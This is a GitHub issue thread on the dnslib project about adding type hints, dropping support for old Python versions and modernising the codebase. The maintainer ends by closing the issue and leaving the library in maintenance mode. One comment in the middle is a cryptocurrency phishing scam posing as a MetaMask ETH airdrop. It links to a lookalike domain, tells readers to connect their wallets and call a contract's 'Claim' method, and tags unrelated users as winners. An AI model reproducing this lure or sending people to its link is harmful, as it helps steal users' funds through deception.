### ISSUE TITLE
Add Type Hints

### ISSUE THREAD

**Issue by nhairs** [paulc/dnslib#56]
It would be good if `dnslib` added and exposed typing information so that calling libraries can check they are passing the correct types.

To support inline type hints would require dropping support for `python<3.5`, however given the [security support schedule](https://endoflife.date/python) it may be desirable to drop support up to `3.7`. [Checking PyPI Stats](https://pypistats.org/packages/dnslib), versions `<=3.6` make up less than 1% of daily downloads.

I'd be willing to help out with this.

**Comment by paulc** [comment]
I'd agree and to be honest it would probably be sensible to drop support for anything < Python 3.7 but to be honest dnslib is a pretty old codebase now (has been on Github for 14 years and was developed on Bitbucket before then for a few years - I think I started it in 2007) and is pretty crufty in places - in particular when I ported from Python 2 to Python 3 it added a lot quite a lot of complexity to maintain Python 2 support - so I've tried to do the minimum necessary to keep it going. It probably needs quite a significant amount of rework to clean up and align with more modern Python coding standards and I'm not sure that would be worth the effort. 

I'm closing this for the moment but would be open to a PR which drops Python 2 and Python < 3.7 support as a first step.

**Comment by nhairs** [comment]
Thanks for that @paulc

Since I intend to provide a PR I feel like it would be better to leave this issue open to indicate that the issue has not been resolved nor has it been rejected.

**Comment by paulc** [comment]
No problem - I've reopened.

Thanks, Paul

**Comment by nhairs** [comment]
Thanks @paulc 

How would you like me to handle PRs for the py37 migration and adding of type hints?

While I'm here I also intend to:
- refactor / cleanup / modernise the library
 - I notice there's a few places where you have written "we do this because of compatibility", if there's anything you think I should take a look at let me know.
- add standard development practices (formatter, linter, etc)
- add ability to generate full docs (similar to [what I've done for NServer](https://nhairs.github.io/nserver/latest/))

I can do things incrementally, but in doing so I'd want to not release until I'm done with the work / it would require more attention over the next few weeks from you to keep things moving.

**Comment by mesidharth** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[![Claim Now](https://pbs.twimg.com/media/Frg-sWYWIAYCoiX.jpg:large)](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @ziasistani, @kprybol, @adragomir, @muffix, @rcaston, @jialezhang, @longgiangp

**Comment by paulc** [comment]
As per the comment in the pull-request I'm closing this issue and will be leaving dnslib in maintenance mode while these changes are pursued separately.
